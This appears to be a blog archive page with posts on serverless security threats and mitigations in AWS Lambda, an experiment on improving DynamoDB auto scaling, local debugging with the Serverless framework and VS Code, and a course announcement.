Many-faced threats to Serverless security

Threats to the security of our serverless applications take many forms, some are the same old foes we have faced before; some are new; and some have taken on new forms in the serverless world.

As we adopt the serverless paradigm for building cloud-hosted applications, we delegate even more of the operational responsibilities to our cloud providers. When you build a serverless architecture around AWS Lambda you no longer have to configure AMIs, patch the OS, and install daemons to collect and distribute logs and metrics for your application. AWS takes care all of that for you.

What does this mean for the Shared Responsibility Model that has long been the cornerstone of security in the AWS cloud?

Protection from attacks against the OS

AWS takes over the responsibility for maintaining the host OS as part of their core competency. Hence alleviating you from the rigorous task of applying all the latest security patches – something most of us just don’t do a good enough job of as it’s not our primary focus.

In doing so, it protects us from attacks against known vulnerabilities in the OS and prevents attacks such as WannaCry.

Also, by removing long lived servers from the picture we also removed the threats posed by compromised servers that live in our environment for a long time.

WannaCry happened because the MS17–017 security patch was not applied to the affected hosts.

WannaCry happened because the MS17–017 security patch was not applied to the affected hosts.

However, it is still our responsibility to patch our application and address vulnerabilities that exist in our code and our dependencies.

OWASP top 10 is still as relevant as ever

Aside from a few reclassifications the OWASP top 10 list has largely stayed the same in 7 years.

Aside from a few reclassifications the OWASP top 10 list has largely stayed the same in 7 years.

A glance at the OWASP top 10 list for 2017 shows us some familiar threats – Injection, Cross-Site Scripting, Sensitive Data Exposure, and so on.

A9 – Components with Known Vulnerabilities

When the folks at Snyk looked at a dataset of 1792 data breaches in 2016 they found that 12 of the top 50 data breaches were caused by applications using components with known vulnerabilities.

Furthermore, 77% of the top 5000 URLs from Alexa include at least one vulnerable library. This is less surprising than it first sound when you consider that some of the most popular front-end js frameworks – eg. jquery, Angular and React – all had known vulnerabilities. It highlights the need to continuously update and patch your dependencies.

However, unlike OS patches which are standalone, trusted and easy to apply, security updates to these 3rd party dependencies are usually bundled with feature and API changes that need to be integrated and tested. It makes our life as developers difficult and it’s yet another thing we gotta do when we’re working overtime to ship new features.

And then there’s the matter of transient dependencies, and boy there are so many of them… If these transient dependencies have vulnerabilities then you too are vulnerable through your direct dependencies.

https://david-dm.org/request/request?view=tree

https://david-dm.org/request/request?view=tree

Finding vulnerabilities in our dependencies is hard work and requires constant diligence, which is why services such as Snyk is so useful. It even comes with a built-in integration with Lambda too!

Attacks against NPM publishers

What if the author/publisher of your 3rd party dependency is not who you think they are?

What if the author/publisher of your 3rd party dependency is not who you think they are?

Just a few weeks ago, a security bounty hunter posted this amazing thread on how he managed to gain direct push rights to 14% of NPM packages. The list of affected packages include some big names too: debug, request, react, co, express, moment, gulp, mongoose, mysql, bower, browserify, electron, jasmine, cheerio, modernizr, redux and many more. In total, these packages account for 20% of the total number of monthly downloads from NPM.

Let that sink in for a moment.

Did he use highly sophisticated methods to circumvent NPM’s security?

Nope, it was a combination of brute force and using known account & credential leaks from a number of sources including Github. In other words, anyone could have pulled these off with very little research.

It’s hard not to feel let down by these package authors when so many display such a cavalier attitude towards securing access to their NPM accounts. I feel my trust in these 3rd party dependencies have been betrayed.

662 users had password «123456», 174 – «123», 124 – «password».

1409 users (1%) used their username as their password, in its original form, without any modifications.

11% of users reused their leaked passwords: 10.6% – directly, and 0.7% – with very minor modifications.

As I demonstrated in my recent talk on Serverless security, one can easily steal temporary AWS credentials from affected Lambda functions (or EC2-hosted Node.js applications) with a few lines of code.

Imagine then, a scenario where an attacker had managed to gain push rights to 14% of all NPM packages. He could publish a patch update to all these packages and steal AWS credentials at a massive scale.

The stakes are high and it’s quite possibly the biggest security threat we face in the serverless world; and it’s equally threatening to applications hosted in containers or VMs.

The problems and risks with package management is not specific to the Node.js ecosystem. I have spent most of my career working with .Net technologies and am now working with Scala at Space Ape Games, package management has been a challenge everywhere. Whether or not you’re talking about Nuget or Maven, or whatever package repository, you’re always at risk if the authors of your dependencies do not exercise the same due diligence to secure their accounts as they would their own applications.

Or, perhaps they do…

A1 – Injection & A3 – XSS

SQL injection and other forms of injection attacks are still possible in the serverless world, as are cross-site scripting attacks.

Even if you’re using NoSQL databases you might not be exempt from injection attacks either. MongoDB for instance, exposes a number of attack vectors through its query APIs.

Arguably DynamoDB’s API makes it hard (at least I haven’t heard of a way yet) for an attacker to orchestrate an injection attack, but you’re still open to other forms of exploits – eg. XSS, and leaked credentials which grants attacker access to DynamoDB tables.

Nonetheless, you should always sanitize user inputs, as well as the output from your Lambda functions.

A6 – Sensitive Data Exposure

Along with servers, web frameworks also disappeared when one migrates to the serverless paradigm. These web frameworks have served us well for many years, but they also handed us a loaded gun we can shot ourselves in the foot with.

As Troy Hunt demonstrated at a recent talk at the LDNUG, we can accidentally expose all kinds of sensitive data by accidentally leaving directory listing options ON. From web.config containing credentials (at 35:28) to SQL backups files (at 1:17:28)!

With API Gateway and Lambda, accidental exposures like this become very unlikely – directory listing is a “feature” you’d have to implement yourself. It forces you to make very conscious decisions about when to support directory listing and the answer is probably never.

IAM

If your Lambda functions are compromised, then the next line of defence is to restrict what these compromised functions can do.

This is why you need to apply the Least Privilege Principle when configuring Lambda permissions.

In the Serverless framework, the default behaviour is to use the same IAM role for all functions in the service.

However, the serverless.yml spec allows you to specify a different IAM role per function. Although as you can see from the examples it involves a lot more development effort and (from my experience) adds enough friction that almost no one does this…

Apply per-function IAM policies.

Apply per-function IAM policies.

IAM policy not versioned with Lambda

A shortcoming with the current Lambda + IAM configuration is that IAM policies are not versioned along with the Lambda function.

In the scenario where you have multiple versions of the same function in active use (perhaps with different aliases), then it becomes problematic to add or remove permissions:

  • adding a new permission to a new version of the function allows old versions of the function additional access that they don’t require (and poses a vulnerability)
  • removing an existing permission from a new version of the function can break old versions of the function that still require that permission

Since the 1.0 release of the Serverless framework this has become less a problem as it no longer use aliases for stages – instead, each stage is deployed as a separate function, eg.

  • service-function-dev
  • service-function-staging
  • service-function-prod

which means it’s far less likely that you’ll need to have multiple versions of the same function in active use.

I also found (from personal experience) account level isolation can help mitigate the problems of adding/removing permissions, and crucially, the isolation also helps compartmentalise security breaches – eg. a compromised function running in a non-production account cannot be used to cause harm in the production account and impact your users.

We can apply the same idea of bulkheads (which has been popularised in the microservices world by Michael Nygard’s “Release It”) and compartmentalise security breaches at an account level.

We can apply the same idea of bulkheads (which has been popularised in the microservices world by Michael Nygard’s “Release It”) and compartmentalise security breaches at an account level.

Delete unused functions

One of the benefits of the serverless paradigm is that you don’t pay for functions when they’re not used.

The flip side of this property is that you have less need to remove unused functions since they don’t show up on your bill. However, these functions still exist as attack surface, even more so than actively used functions because they’re less likely to be updated and patched. Over time, these unused functions can become a hotbed for components with known vulnerabilities that attackers can exploit.

Lambda’s documentations also cites this as one of the best practices.

Delete old Lambda functions that you are no longer using.

The changing face of DoS attacks

With AWS Lambda you are far more likely to scale your way out of a DoS attack. However, scaling your serverless architecture aggressively to fight a DoS attack with brute force has a significant cost implication.

No wonder people started calling DoS attacks against serverless applications Denial of Wallet (DoW) attacks!

“But you can just throttle the no. of concurrent invocations, right?”

Sure, and you end up with a DoS problem instead… it’s a lose-lose situation.

AWS recently introduced AWS Shield but at the time of writing the payment protection (only if you pay a monthly flat fee for AWS Shield Advanced) does not cover Lambda costs incurred during a DoS attack.

For a monthly flat fee, AWS Shield Advanced gives you cost protection in the event of a DoS attack, but that protection does not cover Lambda yet.

For a monthly flat fee, AWS Shield Advanced gives you cost protection in the event of a DoS attack, but that protection does not cover Lambda yet.

Also, Lambda has an at-least-once invocation policy. According to the folks at SunGard, this can result in up to 3 (successful) invocations. From the article, the reported rate of multiple invocations is extremely low – 0.02% – but one wonders if the rate is tied to the load and might manifest itself at a much higher rate during a DoS attack.

Taken from the “Run, Lambda, Run” article below.

Taken from the “Run, Lambda, Run” article mentioned above.

Furthermore, you need to consider how Lambda retries failed invocations by an asynchronous source – eg. S3, SNS, SES, CloudWatch Events, etc. Officially, these invocations are retried twice before they’re sent to the assigned DLQ (if any).

However, an analysis by the OpsGenie guys showed that the no. of retries are not carved in stone and can go up to as many as 6 before the invocation is sent to the DLQ.

If the DoS attacker is able to trigger failed async invocations (perhaps by uploading files to S3 that will cause your function to except when attempting to process) then they can significantly magnify the impact of their attack.

All these add up to the potential for the actual no. of Lambda invocations to explode during a DoS attack. As we discussed earlier, whilst your infrastructure might be able to handle the attack, can your wallet stretch to the same extend? Should you allow it to?

Securing external data

Just a handful of the places you could be storing state outside of your stateless Lambda function.

Just a handful of the places you could be storing state outside of your stateless Lambda function.

Due to the ephemeral nature of Lambda functions, chances are all of your functions are stateless. More than ever, states are stored in external systems and we need to secure them both at rest and in-transit.

Communication to all AWS services are via HTTPS and every request needs to be signed and authenticated. A handful of AWS services also offer server-side encryption for your data at rest – S3, RDS and Kinesis streams springs to mind, and Lambda has built-in integration with KMS to encrypt your functions’ environment variables.

The same diligence needs to be applied when storing sensitive data in services/DBs that do not offer built-in encryption – eg. DynamoDB, Elasticsearch, etc. – and ensure they’re protected at rest. In the case of a data breach, it provides another layer of protection for our users’ data.

We owe our users that much.

Use secure transport when transmitting data to and from services (both external and internal ones). If you’re building APIs with API Gateway and Lambda then you’re forced to use HTTPS by default, which is a good thing. However, API Gateway is always publicly accessible and you need to take the necessary precautions to secure access to internal APIs.

You can use API keys but I think it’s better to use IAM roles. It gives you fine grained control over who can invoke which actions on which resources. Also, using IAM roles spares you from awkward conversations like this:

“It’s X’s last day, he probably has our API keys on his laptop somewhere, should we rotate the API keys just in case?”

“mm.. that’d be a lot of work, X is trustworthy, he’s not gonna do anything.”

“ok… if you say so… (secretly pray X doesn’t lose his laptop or develop a belated grudge against the company)”

Fortunately, both can be easily configured using the Serverless framework.

Leaked credentials

Don’t become an unwilling bitcoin miner.

Don’t become an unwilling bitcoin miner.

The internet is full of horror stories of developers racking up a massive AWS bill after their leaked credentials are used by cyber-criminals to mine bitcoins. For every such story many more would have been affected but choose to be silent (for the same reason many security breaches are not announced publicly as big companies do not want to appear incompetent).

Even within my small social circle (*sobs) I have heard 2 such incidents, neither were made public and both resulted in over $100k worth of damages. Fortunately, in both cases AWS agreed to cover the cost.

I know for a fact that AWS actively scan public Github repos for active AWS credentials and try to alert you as soon as possible. But as some of the above stories mentioned, even if your credentials were leaked only for a brief window of time it will not escape the watchful gaze of attackers. (plus, they still exist in git commit history unless you rewrite the history too, best to deactivate the credentials if possible).

A good approach to prevent AWS credential leaks is to use git pre-commit hooks as outlined by this post.

Conclusions

We looked at a number of security threats to our serverless applications in this post, many of them are the same threats that have plighted the software industry for years. All of the OWASP top 10 still apply to us, including SQL, NoSQL and other forms of injection attacks.

Leaked AWS credentials remain a major issue and can potentially impact any organisation that uses AWS. Whilst there are quite a few publicly reported incidents, I have a strong feeling that the actual no. of incidents are much much higher.

We are still responsible for securing our users’ data both at rest as well as in-transit. API Gateway is always publicly accessible, so we need to take the necessary precautions to secure access to our internal APIs, preferably with IAM roles. IAM offers fine grained control over who can invoke which actions on your API resources, and make it easy to manage access when employees come and go.

On a positive note, having AWS take over the responsibility for the security of the host OS gives us a no. of security benefits:

  • protection against OS attacks because AWS can do a much better job of patching known vulnerabilities in the OS
  • host OS are ephemeral which means no long-lived compromised servers
  • it’s much harder to accidentally leave sensitive data exposed by forgetting to turn off directory listing options in a web framework – because you no longer need such web frameworks!

DoS attacks have taken a new form in the serverless world. Whilst you’re probably able to scale your way out of an attack, it’ll still hurt you in the wallet, hence why DoS attacks have become known in the serverless world as Denial of Wallet attacks. Lambda costs incurred during a DoS attack is not covered by AWS Shield Advanced at the time of writing, but hopefully they will be in the near future.

Meanwhile, some new attack surfaces have emerged with AWS Lambda:

  • functions are often given too much permission because they’re not given individual IAM policies tailored to their needs, a compromised function can therefore do more harm than it might otherwise
  • unused functions are often left around for a long time as there is no cost associated with them, but attackers might be able to exploit them especially if they’re not actively maintained and therefore are likely to contain known vulnerabilities

Above all, the most worrisome threat for me are attacks against the package authors themselves. It has been shown that many authors do not take the security of their accounts seriously, and as such endangers themselves as well as the rest of the community that depends on them. It’s impossible to guard against such attacks and erodes one of the strongest aspect of any software ecosystem – the community behind it.

Once again, people have proven to be the weakest link in the security chain.

The problems with DynamoDB Auto Scaling and how it might be improved

TL;DR – AWS announced the long awaited auto scaling capability for DynamoDB, but we found it takes too long to scale up and doesn’t scale up aggressively enough as it’s held back by using consumed capacity as scaling metric rather than actual request count.

Here at Space Ape Games we developed an in-house tech to auto scale DynamoDB throughput and have used it successfully in production for a few years. It’s even integrated with our LiveOps tooling and scales up our DynamoDB tables according to the schedule of live events. This way, our tables are always provisioned just ahead of that inevitable spike in traffic at the start of an event.

Auto scaling DynamoDB is a common problem for AWS customers, I have personally implemented similar tech to deal with this problem at two previous companies. Whilst at Yubl, I even applied the same technique to auto scale Kinesis streams too.

When AWS announced DynamoDB Auto Scaling we were excited. However, the blog post that accompanied the announcement illustrated two problems:

  • the reaction time to scaling up is slow (10–15 mins)
  • it did not scale sufficiently to maintain the 70% utilization level
Notice the high no. of throttled operations despite the scaling activity. If you were scaling the table manually, would you have settled for this result?

Notice the high no. of throttled operations despite the scaling activity. If you were scaling the table manually, would you have settled for this result?

It looks as though the author’s test did not match the kind of workload that DynamoDB Auto Scaling is designed to accommodate:

In our case, we also have a high write-to-read ratio (typically around 1:1) because every action the players perform in a game changes their state in some way. So unfortunately we can’t use DAX as a get-out-of-jail free card.

How DynamoDB auto scaling works

When you modify the auto scaling settings on a table’s read or write throughput, it automatically creates/updates CloudWatch alarms for that table – four for writes and four for reads.

As you can see from the screenshot below, DynamoDB auto scaling uses CloudWatch alarms to trigger scaling actions. When the consumed capacity units breaches the utilization level on the table (which defaults to 70%) for 5 mins consecutively it will then scale up the corresponding provisioned capacity units.

Problems with the current system, and how it might be improved

From our own tests we found DynamoDB’s lacklustre performance at scaling up is rooted in 2 problems:

  1. The CloudWatch alarms requires 5 consecutive threshold breaches. When you take into account the latency in CloudWatch metrics (which typically are a few mins behind) it means scaling actions occur up to 10 mins after the specified utilization level is first breached. This reaction time is too slow.
  2. The new provisioned capacity unit is calculated based on consumed capacity units rather than the actual request count. The consumed capacity units is itself constrained by the provisioned capacity units even though it’s possible to temporarily exceed the provisioned capacity units with burst capacity. What this means is that once you’ve exhausted the saved burst capacity, the actual request count can start to outpace the consumed capacity units and scaling up is not able to keep pace with the increase in actual request count. We will see the effect of this in the results from the control group later.

Based on these observations, we hypothesize that you can make two modifications to the system to improve its effectiveness:

  1. trigger scaling up after 1 threshold breach instead of 5, which is in-line with the mantra of “scale up early, scale down slowly”.
  2. trigger scaling activity based on actual request count instead of consumed capacity units, and calculate the new provisioned capacity units using actual request count as well.

As part of this experiment, we also prototyped these changes (by hijacking the CloudWatch alarms) to demonstrate their improvement.

Testing Methodology

The most important thing for this test is a reliable and reproducible way of generating the desired traffic patterns.

To do that, we have a recursive function that will make BatchPut requests against the DynamoDB table under test every second. The items per second rate is calculated based on the elapsed time (t) in seconds so it gives us a lot of flexibility to shape the traffic pattern we want.

Since a Lambda function can only run for a max of 5 mins, when context.getRemainingTimeInMillis() is less than 2000 the function will recurse and pass the last recorded elapsed time (t) in the payload for the next invocation.

The result is a continuous, smooth traffic pattern you see below.

We tested with 2 traffic patterns we see regularly.

Bell Curve

This should be a familiar traffic pattern for most – a slow & steady buildup of traffic from the trough to the peak, followed by a faster drop off as users go to sleep. After a period of steady traffic throughout the night things start to pick up again the next day.

For many of us whose user base is concentrated in the North America region, the peak is usually around 3–4am UK time – the more reason we need DynamoDB Auto Scaling to do its job and not wake us up!

This traffic pattern is characterised by a) steady traffic at the trough, b) slow & steady build up towards the peak, c) fast drop off towards the trough, and repeat.

This traffic pattern is characterised by a) steady traffic at the trough, b) slow & steady build up towards the peak, c) fast drop off towards the trough, and repeat.

Top Heavy

This sudden burst of traffic is usually precipitated by an event – a marketing campaign, a promotion by the app store, or in our case a scheduled LiveOpsevent.

In most cases these events are predictable and we scale up DynamoDB tables ahead of time via our automated tooling. However, in the unlikely event of an unplanned burst of traffic (and it has happened to us a few times) a goodauto scaling system should scale up quickly and aggressively to minimise the disruption to our players.

This pattern is characterised by a) sharp climb in traffic, b) a slow & steady decline, c) stay at a stead level until the anomaly finishes and it goes back to the Bell Curve again.

This pattern is characterised by a) sharp climb in traffic, b) a slow & steady decline, c) stay at a stead level until the anomaly finishes and it goes back to the Bell Curve again.

We tested these traffic patterns against several utilization level settings (default is 70%) to see how it handles them. We measured the performance of the system by:

  • the % of successful requests (ie. consumed capacity / request count)
  • the total no. of throttled requests during the test

These results will act as our control group.

We then tested the same traffic patterns against the 2 hypothetical auto scaling changes we proposed above.

To prototype the proposed changes we hijacked the CloudWatch alarms created by DynamoDB auto scaling using CloudWatch events.

When a PutMetricAlarm API call is made, our change_cw_alarm function is invoked and replaces the existing CloudWatch alarms with the relevant changes – ie. set the EvaluationPeriods to 1 minute for hypothesis 1.

To avoid an invocation loop, the Lambda function will only make changes to the CloudWatch alarm if the EvaluationPeriod has not been changed to 1 min already.

To avoid an invocation loop, the Lambda function will only make changes to the CloudWatch alarm if the EvaluationPeriod has not been changed to 1 min already.

The change_cw_alarm function changed the breach threshold for the CloudWatch alarms to 1 min.

The change_cw_alarm function changed the breach threshold for the CloudWatch alarms to 1 min.

For hypothesis 2, we have to take over the responsibility of scaling up the table as we need to calculate the new provisioned capacity units using a custom metric that tracks the actual request count. Hence why the AlarmActions for the CloudWatch alarm is also overridden here.

The SNS topic is subscribed to a Lambda function which scales up the throughput of the table.

The SNS topic is subscribed to a Lambda function which scales up the throughput of the table.

Result (Bell Curve)

The test is setup as following:

  1. table starts off with 50 write capacity unit
  2. traffic holds steady for 15 mins at 25 writes/s
  3. traffic then increases to peak level (300 writes/s) at a steady rate over the next 45 mins
  4. traffic drops off back to 25 writes/s at a steady rate over the next 15 mins
  5. traffic holds steady at 25 writes/s

All the units in the diagrams are of SUM/min, which is how CloudWatch tracks ConsumedWriteCapacityUnits and WriteThrottleEvents, but I had to normalise the ProvisionedWriteCapacityUnits (which is tracked as per second unit) to make them consistent.

Let’s start by seeing how the control group (vanilla DynamoDB auto scaling) performed at different utilization levels from 30% to 80%.

I’m not sure why the total consumed units and total request count metrics didn’t match exactly when the utilization is between 30% and 50%, but seeing as there were no throttled events I’m going to put that difference down to inaccuracies in CloudWatch.

I’m not sure why the total consumed units and total request count metrics didn’t match exactly when the utilization is between 30% and 50%, but seeing as there were no throttled events I’m going to put that difference down to inaccuracies in CloudWatch.

I make several observations from these results:

  1. At 30%-50% utilization levels, write ops are never throttled – this is what we want to see in production.
  2. At 60% utilization level, the slow reaction time (problem 1) caused writes to be throttled early on as the system adjust to the steady increase in load but it was eventually able to adapt.
  3. At 70% and 80% utilization level, things really fell apart. The growth in the actual request count outpaced the growth of consumed capacity units, more and more write ops were throttled as the system failed to adapt to the new level of actual utilization (as opposed to “allowed”utilization measured by consumed capacity units, ie problem 2).

Hypothesis 1 : scaling after 1 min breach

Some observations:

  1. At 30%-50% utilization level, there’s no difference to performance.
  2. At 60% utilization level, the early throttled writes we saw in the control group is now addressed as we decreased the reaction time of the system.
  3. At 70%-80% utilization levels, there is negligible difference in performance. This is to be expected as the poor performance in the control group is caused by problem 2, so improving reaction time alone is unlikely to significantly improve performances in these cases.

Hypothesis 2 : scaling after 1 min breach on actual request count

Scaling on actual request count and using actual request count to calculate the new provisioned capacity units yields amazing results. There were no throttled events at 30%-70% utilization levels.

Even at 80% utilization level both the success rate and total no. of throttled events have improved significantly.

This is an acceptable level of performance for an autoscaling system, one that I’ll be happy to use in a production environment. Although, I’ll still lean on the side of caution and choose a utilization level at or below 70% to give the table enough headroom to deal with sudden spikes in traffic.

Results (Top Heavy)

The test is setup as following:

  1. table starts off with 50 write capacity unit
  2. traffic holds steady for 15 mins at 25 writes/s
  3. traffic then jumps to peak level (300 writes/s) at a steady rate over the next 5 mins
  4. traffic then decreases at a rate of 3 writes/s per minute

Once again, let’s start by looking at the performance of the control group (vanilla DynamoDB auto scaling) at various utilization levels.

Some observations from the results above:

  1. At 30%-60% utilization levels, most of the throttled writes can be attributed to the slow reaction time (problem 1). Once the table started to scale up the no. of throttled writes quickly decreased.
  2. At 70%-80% utilization levels, the system also didn’t scale up aggressively enough (problem 2). Hence we experienced throttled writes for much longer, resulting in a much worse performance overall.

Hypothesis 1 : scaling after 1 min breach

Some observations:

  1. Across the board the performance has improved, especially at the 30%-60% utilization levels.
  2. At 70%-80% utilization levels we’re still seeing the effect of problem 2 – not scaling up aggressively enough. As a result, there’s still a long tail to the throttled write ops.

Hypothesis 2 : scaling after 1 min breach on actual request count

Similar to what we observed with the Bell Curve traffic pattern, this implementation is significantly better at coping with sudden spikes in traffic at all utilization levels tested.

Even at 80% utilization level (which really doesn’t leave you with a lot of head room) an impressive 94% of write operations succeeded (compared with 73% recorded by the control group). Whilst there is still a significant no. of throttled events, it compares favourably against the 500k+ count recorded by the vanilla DynamoDB auto scaling.

Conclusions

I like DynamoDB, and I would like to use its auto scaling capability out of the box but it just doesn’t quite match my expectations at the moment. I hope someone from AWS is reading this, and that this post provides sufficient proof (as you can see from the data below) that it can be vastly improved with relatively small changes.

Feel free to play around with the demo, all the code is available here.

Running and debugging AWS Lambda functions locally with the Serverless framework and VS Code

One of the complaints developers often have for AWS Lambda is the inability to run and debug functions locally. For Node.js at least, the Serverless framework and VS Code provides a good solution for doing just that.

An often underused feature of the Serverless framework is the invoke local command, which runs your code locally by emulating the AWS Lambda environment. Granted, it’s not a perfect simulation and only works with Node.js and Python, but it has been good enough for most of local development needs.

With VS Code, you have the ability to debug Node.js applications, including the option to launch an external program.

Put the two together and you have the ability to locally run and debug your Lambda functions.

Step 1 : install Serverless framework as dev dependency

In general, it’s a good idea to install Serverless framework as a dev dependency in a project because:

  1. it allows other developers (and the CI server) to use the Serverless framework for deployment without having to install it themselves
  2. it prevents incompatibility issues when you have an incompatible version of Serverless framework installed to that used by the serverless.yml file in the project
  3. since Serverless v1.16.0 dev dependencies are excluded from the deployment package so it wouldn’t add to your deployment size (this is broken in the current version v1.18.0 but should be fixed shortly)

Step 2 : add debug configuration

Invoke the “sls invoke local” CLI command against the “hello” function with an empty object {} as input. It’s also possible to invoke the function with a JSON file, see doc here.

Step 3 : enjoy!

There, nice and easy :-)

Couple of things to note:

  • if your function depends on environment variables, then you can set those up in the launch.json config file in step 2
  • if your function needs to access other AWS resources, then you also need to setup the relevant environment variables (eg. AWS_PROFILE) for the aws-sdk to access those resources in the correct AWS account
  • this approach will not work for recursive functions (well, the recursion will happen on the deployed Lambda function, so you won’t be able to debug it)

I’m running a live course on designing serverless architecture with AWS Lambda

Hi everyone, just a quick note to let you know that I’m running a live online course with O’Reilly on designing serverless architectures with AWS Lambda.

It’s a 2-day course on September 11-12th with 6 hours in total, and it’s available for free if you have a subscription with SafariBooksOnline. Registration for the course is open till September 7th, so if there are still spaces available then you can even sign up for a free 10-day trial on SafariBooksOnline just before registration closes and get the course for free.

Sign up here.

The course will cover a variety of topics over the two days:

  • AWS Lambda basics
  • the Serverless framework
  • testing strategies
  • CI/CD
  • centralised logging
  • distributed tracing
  • monitoring
  • performance considerations including cold starts
  • config management
  • Lambda in VPC
  • security
  • best practices with API Gateway and Kinesis
  • step functions
  • explore several design patterns with Lambda

Slides for my serverless security talk